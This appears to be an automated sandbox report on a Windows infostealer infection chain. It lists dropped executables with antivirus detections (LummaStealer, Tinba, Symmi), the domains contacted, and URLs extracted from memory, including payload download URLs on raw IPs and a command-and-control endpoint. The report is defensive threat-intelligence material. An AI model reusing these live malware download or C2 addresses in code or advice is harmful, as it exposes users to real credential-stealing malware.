C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe	16%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	47%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	39%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	29%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	47%	ReversingLabs	Win32.Trojan.Lummac
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	32%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	16%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	47%	ReversingLabs	Win32.Trojan.Lummac
C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	39%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	29%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	32%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	58%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://atten-supporse.biz/api3Co	0%	Avira URL Cloud	safe
https://monitor.firefox.comhttps://truecolors.firefox.comhttps://support.mozilla.orgbrowser.tabs.dra	0%	Avira URL Cloud	safe
http://185.215.113.206?	100%	Avira URL Cloud	malware
http://31.41.244.11/files/unique2/random.exe60N	0%	Avira URL Cloud	safe
http://31.41.244.11/files/unique2/random.exe1aa;	0%	Avira URL Cloud	safe
http://31.41.244.11/files/unique2/random.exe1	0%	Avira URL Cloud	safe
http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe7	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe:	0%	Avira URL Cloud	safe
https://atten-supporse.biz:443/apif0cK3T	0%	Avira URL Cloud	safe
https://atten-supporse.biz/apiPC	0%	Avira URL Cloud	safe
http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exeC	0%	Avira URL Cloud	safe
http://31.41.244.11/files/6802601040/SxQyhJr.exe	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
star-mini.c10r.facebook.com	157.240.195.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.129	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
youtube.com	142.250.181.78	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
atten-supporse.biz	104.21.16.9	true	false	high
youtube-ui.l.google.com	172.217.19.14	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	high
ipv4only.arpa	192.0.0.171	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
home.twentykx20pt.top	34.118.84.150	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
httpbin.org	18.208.8.205	true	false	high
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
https://atten-supporse.biz/api	false	high
https://httpbin.org/ip	false	high
https://atten-supporse.biz:443/api	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://atten-supporse.biz/api3Co	a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/exec/obidos/external-search/chrome://browser/content/parent/ext-devtools-pane	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/unique2/random.exe1aa;	skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
http://detectportal.firefox.com/	firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/unique2/random.exe60N	skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 0000001F.00000002.2955222099.000001D14E8C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/originsDaysCutOff	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.comhttps://truecolors.firefox.comhttps://support.mozilla.orgbrowser.tabs.dra	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://screenshots.firefox.com	firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestSponsoredEnabled	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206?	b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
http://31.41.244.11/files/unique2/random.exe1	skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	false		high
http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi	98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
http://exslt.org/common	firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ok.ru/	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
http://exslt.org/dates-and-times	firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.org/firefox/addon/to-google-translate/	firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152	firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 0000001C.00000003.2925812595.000001DEF10B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mitmdetection.services.mozilla.com/	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe7	skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe:	skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exe	a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/	firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573323312.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://www.iqiyi.com/	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz:443/apif0cK3T	a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mozilla.org/#/properties/addonsFeatureGate	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
http://mozilla.org/#/properties/addonsShowLessFrequentlyCap	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeo	skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpw	b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/about	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://account.bellmedia.c	firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apiPC	a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2961232201.00000000012CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zhihu.com/	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?t=ffab&q=	firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2	firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll	skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
